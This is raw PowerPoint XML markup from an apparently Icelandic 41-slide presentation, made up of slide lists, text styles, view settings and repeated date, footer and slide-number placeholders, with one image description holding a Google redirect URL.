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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId43"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId44"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="1056" r:id="rId2"/>
    <p:sldId id="1085" r:id="rId3"/>
    <p:sldId id="1086" r:id="rId4"/>
    <p:sldId id="1087" r:id="rId5"/>
    <p:sldId id="1088" r:id="rId6"/>
    <p:sldId id="1089" r:id="rId7"/>
    <p:sldId id="1090" r:id="rId8"/>
    <p:sldId id="1129" r:id="rId9"/>
    <p:sldId id="1091" r:id="rId10"/>
    <p:sldId id="1092" r:id="rId11"/>
    <p:sldId id="1093" r:id="rId12"/>
    <p:sldId id="1094" r:id="rId13"/>
    <p:sldId id="1095" r:id="rId14"/>
    <p:sldId id="1096" r:id="rId15"/>
    <p:sldId id="1097" r:id="rId16"/>
    <p:sldId id="1098" r:id="rId17"/>
    <p:sldId id="1101" r:id="rId18"/>
    <p:sldId id="1102" r:id="rId19"/>
    <p:sldId id="1103" r:id="rId20"/>
    <p:sldId id="1104" r:id="rId21"/>
    <p:sldId id="1105" r:id="rId22"/>
    <p:sldId id="1106" r:id="rId23"/>
    <p:sldId id="1107" r:id="rId24"/>
    <p:sldId id="1109" r:id="rId25"/>
    <p:sldId id="1110" r:id="rId26"/>
    <p:sldId id="1111" r:id="rId27"/>
    <p:sldId id="1112" r:id="rId28"/>
    <p:sldId id="1113" r:id="rId29"/>
    <p:sldId id="1114" r:id="rId30"/>
    <p:sldId id="1115" r:id="rId31"/>
    <p:sldId id="1116" r:id="rId32"/>
    <p:sldId id="1117" r:id="rId33"/>
    <p:sldId id="1118" r:id="rId34"/>
    <p:sldId id="1119" r:id="rId35"/>
    <p:sldId id="1121" r:id="rId36"/>
    <p:sldId id="1122" r:id="rId37"/>
    <p:sldId id="1123" r:id="rId38"/>
    <p:sldId id="1124" r:id="rId39"/>
    <p:sldId id="1125" r:id="rId40"/>
    <p:sldId id="1126" r:id="rId41"/>
    <p:sldId id="1127" r:id="rId42"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7302500" cy="9586913"/>
  <p:custDataLst>
    <p:tags r:id="rId45"/>
  </p:custDataLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl9pPr>
  </p:defaultTextStyle>
  <p:extLst>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="1536">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9999"/>
    <a:srgbClr val="D5F1CF"/>
    <a:srgbClr val="FFFFCC"/>
    <a:srgbClr val="F6F5BD"/>
    <a:srgbClr val="CDF1C5"/>
    <a:srgbClr val="F1C7C7"/>
    <a:srgbClr val="EDEA77"/>
    <a:srgbClr val="A8E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604" autoAdjust="0"/>
    <p:restoredTop sz="94649" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1668" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1536"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="80" d="100"/>
        <a:sy n="80" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>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eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>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eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>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eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="120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eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A4067047-E766-4254-821F-B27F8CFA18AA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36179313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b="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>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Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6554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b="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>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atin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FD8AD92D-85DC-42ED-A1F9-C1217E42EA98}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30001398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33785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07504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54381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64869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5808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21347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41949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31365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002867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22214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39839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073453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888353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924591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643220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7294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15897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581753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816367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830177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068454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55852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752234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23022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182312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044869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38223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35693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97067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8545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97493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83747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266326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504398"/>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843880"/>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2316832"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="0" y="5504398"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="http://www.google.is/url?source=imglanding&amp;ct=img&amp;q=http://images.mylot.com/userImages/images/postphotos/1364942.jpg&amp;sa=X&amp;ei=PJmRT6ebArTa4QTY2ujHBA&amp;ved=0CAoQ8wc&amp;usg=AFQjCNGPcez20GoZ2Rm79w8PKcWP7YQAv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116632"/>
            <a:ext cx="3528392" cy="2646294"/>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476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640597" y="6377459"/>
            <a:ext cx="3836404" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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897288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:extLst/>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57200" y="6476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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57200" y="6476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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57200" y="6476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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a:xfrm>
            <a:off x="457200" y="6476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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476999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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76999"/>
            <a:ext cx="2133600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640596" y="6476999"/>
            <a:ext cx="5507719" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204396" y="6476999"/>
            <a:ext cx="733864" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DB8A938-B959-4303-8312-23A20987E89F}" type="datetimeFigureOut">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>14.9.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:shade val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="is-IS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
